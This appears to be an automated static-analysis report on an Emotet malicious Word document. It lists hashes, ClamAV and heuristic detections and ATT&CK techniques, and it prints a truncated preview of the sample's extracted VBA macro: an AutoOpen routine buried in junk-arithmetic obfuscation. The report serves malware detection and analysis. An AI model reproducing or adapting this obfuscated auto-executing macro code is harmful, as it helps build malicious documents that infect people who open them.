Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 f7c389a98aa92bea…

MALICIOUS

Office (OLE)

Size: 177.6 KB
Created: 2019-03-28 12:11:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 2c1c65cb4aea9f8cb40e61522cfdcab4
SHA-1: d4b421e53ab59b17bc4e4460cca2fdff907a1952
SHA-256: f7c389a98aa92bea8e2dc4f4c99a310a8351ab4dbc636cb4c41b00df79ea5c95
Risk Score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6915911-0', indicating a downloader functionality. High-severity heuristics confirm the presence of VBA macros, specifically an 'AutoOpen' macro that utilizes 'GetObject', suggesting an attempt to execute code. The macro's obfuscated nature and the 'GetObject' call strongly imply it's designed to download and execute a second-stage payload, a common Emotet tactic.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6915911-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6915911-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 27836 bytes
SHA-256: c4679016e3e0558534d4e107e90d43039dab874c4b3627f3585416ccd6084499

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "SUA1oUA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jAoAAAUU"
Attribute VB_Base = "0{A47B6741-B00D-4B55-8CA1-C260083119C4}{F6F9139C-DB7C-42FB-82EB-2A07D20EA084}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "wwDAAAU1"
Attribute VB_Base = "0{4EE7E74E-959E-4AE3-A66F-EEA932E7F759}{2428C857-52B5-4749-B34B-8DAA1EA7DB92}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "CAA4DAU"
Function UA_QZ_()
   If vAUkAB = GAADwC Then
         nDX4_A_ = (688104598 - WcxAC_A * zB44AU * CDate(995134992))
         uXADoQ = PB4BcUU / Oct(rXZo_1A) - oAZ1o_A * CDbl(318628824) / PDDAAQ * Fix(170622870 * Log(RxBAAZoA)) / WoQB_c * Chr(151237250) * 900149291 * Sgn(GXGA_BAA / Log(927030347))
End If
   If sAwAU1 = MAcAACAA Then
         RDAxX1D = (1453336 - ScAAQQU * E4XcxBGU * CDate(591982750))
         ZxGAAwZB = OU__AAQA / Oct(cGB4AAk) - aAQkAx * CDbl(354232328) / vA1QkBAX * Fix(705437125 * Log(iAADUkAA)) / iDAUAxZ * Chr(290458042) * 334185540 * Sgn(wAUAwcQc / Log(791639010))
End If
   If SQ1AcA = tQckwQB Then
         KAZCxUG = (751389175 - SDAwAwA * tcDDZ4 * CDate(83847869))
         ZAACZZ_ = JADA1B / Oct(MABAAA) - X4kXcACU * CDbl(151320231) / AAoQQc * Fix(20422756 * Log(nAUZ4ADA)) / iAAwxA * Chr(340485134) * 563333166 * Sgn(UG_AQ_AD / Log(273539875))
End If
   If CAUUkAAA = pDoAQGA Then
         JBUAQBA = (749663611 - zx_DkQ * roU_AB1 * CDate(689963994))
         nAAQAB = ixAoXB / Oct(CUAcQkQD) - kUAQxD * CDbl(913354321) / jAAA4XAk * Fix(976837005 * Log(ikACAADC)) / twAXAAx * Chr(147071862) * 999483376 * Sgn(X4AAoAUQ / Log(695920525))
End If
   If lADDwwU = J4BAxw Then
         UABAAQDB = (756000771 - uUxAA_ * OUUkQBw * CDate(527911137))
         NA14GAUD = PcA_11A / Oct(zAUCAC) - fxBAccoZ * CDbl(868364882) / mcAAwA * Fix(291895848 * Log(wBwAZUA)) / GGADAAA * Chr(648967435) * 400633718 * Sgn(ScAZAC / Log(158327118))
End If
   If RCUXAQo = zkXQAU Then
         XAAAABCB = (7526644 - JxQ1AAUX * GA_UAAQo * CDate(168814414))
         rAADxAU = fUAoUcAB / Oct(VQoAA14U) - JUB4QA * CDbl(595955921) / BXcDGDUx * Fix(563465634 * Log(jCAA_AcU)) / WAwABo * Chr(879810525) * 441073972 * Sgn(UAAkAA_ / Log(207143835))
End If
   If RXwABU = JCX1DDA Then
         VDAADUA = (57293670 - VoDBUBQ * NG_GZUQ * CDate(536414623))
         p4xACok = z_1BXAk / Oct(T_U1QQ) - wGGA4XAA * CDbl(576953630) / CAG41U4 * Fix(34694068 * Log(NCDQGA)) / ZAZUcCA4 * Chr(45963371) * 389931454 * Sgn(HAGABCUo / Log(434572776))
End If
   If lQ4CQ_CA = SXBCAQBA Then
         YADBA_ = (244857421 - rA1C_Q * lw_Aw14k * CDate(283022064))
         cxoCXUZ1 = J1w4C4oA / Oct(UDQBGA) - HAU_QA * CDbl(778889406) / skACAAwQ * Fix(933047311 * Log(NUADA4U)) / AAAQAAA * Chr(18622373) * 718764506 * Sgn(qA4xAcAk / Log(22002999))
End If
   If JA11QBDA = l_QAB1DQ Then
         Bk1_XDX = (366737905 - b1wB4B * hxQAA_Q * CDate(178858598))
         VABQUA = mBkUGU / Oct(MAwUw1k) - EUoUBCcD * CDbl(923506032) / ZcBABQA * Fix(354352169 * Log(SD_AwD)) / Dk4kG4 * Chr(594403804) * 102652740 * Sgn(ukAAQ1AA / Log(841183881))
End If
End Function
Sub autoopen()
On Error Resume Next
   If Vx1ABB = vAADAA Then
         zAGCAZ = (508186873 - uABZUADZ * TZQAAAA * CDate(740808591))
         FZXAAoUX = wZUAGA / Oct(LAABAxA4) - NADADUU * CDbl(392799179) / dAXXUU * Fix(472562357 * Log(l4UZAZ1A)) / J4AZAACA * Chr(192308210) * 420688127 * Sgn(OAxAAC / Log(259002929))
End If
   If TA_UAAU = D1DUUk Then
         DA_AU1_ = (528634885 - sAXXAA * OAA4xB * CDate(868662169))
         V
... (truncated)